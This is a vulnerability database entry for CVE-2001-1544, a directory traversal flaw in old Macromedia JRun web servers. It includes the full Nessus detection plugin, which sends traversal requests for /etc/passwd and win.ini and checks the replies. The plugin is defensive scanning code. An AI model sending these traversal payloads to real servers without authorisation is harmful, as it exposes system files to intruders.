Vulnerabilities > CVE-2001-1544 - Directory Traversal vulnerability in Macromedia Jrun 2.3.3/3.0/3.1

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
macromedia
nessus

Summary

Directory traversal vulnerability in Macromedia JRun Web Server (JWS) 2.3.3, 3.0 and 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the HTTP GET request.

Vulnerable Configurations

Part Description Count
Application
Macromedia
3

Nessus

NASL familyCGI abuses
NASL idDDI_JRUN_TRAVERSAL.NASL
descriptionThis host is running the Allaire JRun web server. Versions 2.3.3, 3.0, and 3.1 are vulnerable to a directory traversal attack. This allows a potential intruder to view the contents of any file on the system.
last seen2020-06-01
modified2020-06-02
plugin id10997
published2002-06-05
reporterThis script is Copyright (C) 2002-2018 Digital Defense Inc.
sourcehttps://www.tenable.com/plugins/nessus/10997
titleJRun Web Server (JWS) GET Request Traversal Arbitrary File Access
code
#
# This script was written by H D Moore
#
# Script audit and contributions from Carmichael Security
#      Erik Anderson <[email protected]> (nb: domain no longer exists)
#      Added BugtraqID
#
# Changes by Tenable:
# - Revised plugin title (2/05/2009)

include("compat.inc");

if(description)
{
    script_id(10997);
    script_version ("1.27");

    script_cve_id("CVE-2001-1544");
    script_bugtraq_id(3666);

    script_name(english:"JRun Web Server (JWS) GET Request Traversal Arbitrary File Access");
    script_summary(english:"Attempts directory traversal attack");

     script_set_attribute(attribute:"synopsis", value:
"The remote web server is prone to a directory traversal attack.");
     script_set_attribute(attribute:"description", value:
"This host is running the Allaire JRun web server.  Versions 2.3.3,
3.0, and 3.1 are vulnerable to a directory traversal attack.  This
allows a potential intruder to view the contents of any file on the
system.");
     script_set_attribute(attribute:"solution", value:
"The vendor has addressed this issue in Macromedia Product Security
Bulletin MPSB01-17.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
    script_set_attribute(attribute:"plugin_publication_date", value:
"2002/06/05");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/12/06");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_end_attributes();

    script_category(ACT_GATHER_INFO);

    script_copyright(english:"This script is Copyright (C) 2002-2020 Digital Defense Inc.");
    script_family(english:"CGI abuses");
    script_dependencie("find_service1.nasl", "http_version.nasl");
    script_require_ports("Services/www", 8000);
    script_require_keys("www/jrun");
    exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");

req_unx = "/../../../../../../../../etc/passwd"; 	pat_unx = "root:";
req_win = "/..\..\..\..\..\..\..\..\winnt\win.ini"; 	pat_win = "[fonts]";

port = get_http_port(default:8000, embedded:TRUE);

wkey = string("web/traversal/", port);

trav = get_kb_item(wkey);
if (trav) exit(0);

if(get_port_state(port))
{
    req = http_get(item:req_unx, port:port);      
    res = http_keepalive_send_recv(data:req, port:port);
    if ( isnull(res)) exit(0);
    
    if(pat_unx >< res)
    {
        wkey = string("web/traversal/", port);
        set_kb_item(name:wkey, value:TRUE);
        security_warning(port);
        exit(0);
    }
    
    req = http_get(item:req_win, port:port);      
    res = http_keepalive_send_recv(port:port, data:req);
    if ( res == NULL ) exit(0);

    if(pat_win >< res)
    {
        wkey = string("web/traversal/", port);
        set_kb_item(name:wkey, value:TRUE);    
        security_warning(port);
        exit(0);
    }  
}